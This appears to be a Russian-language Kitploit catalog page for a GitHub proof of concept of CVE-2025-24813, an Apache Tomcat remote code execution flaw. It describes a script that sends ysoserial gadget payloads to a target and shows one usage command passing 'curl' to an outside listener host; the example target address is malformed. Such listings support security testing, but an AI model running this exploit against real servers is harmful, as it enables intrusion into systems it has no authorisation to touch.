Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/tonyarris/cve-2025-24813-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubtonyarris/cve-2025-24813-poc

CVE-2025-24813-PoC

A PoC for CVE-2025-24813

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-24813-PoC

CVE-2025-24813 затрагивает Apache Tomcat — если используется уязвимая версия и она катастрофически неправильно сконфигурирована, злоумышленник может получить RCE с помощью одного GET и одного POST.

Подробнее здесь

Это скрипт Yiheng An, Jun Li, Qiang Liu, Haozhe Zhang, Qi Deng из недавнего writeup, модифицированный для приёма команды, генерации всех гаджет-пейлоадов ysoserial и отправки их на вашу цель.

Опубликовано в интересах этического тестирования безопасности.

Пример использования:

root@kitploit:~
python3 exploit.py --command 'curl http://yourcollaburl' --target 'http://192.168.10.0.1:8080' --proxy '127.0.0.1:8080'

poc.mp4 показывает скрипт в действии, генерацию пейлоадов и отправку их на цель, а на правой панели видно, что вызывается interact listener.

Скачать инструмент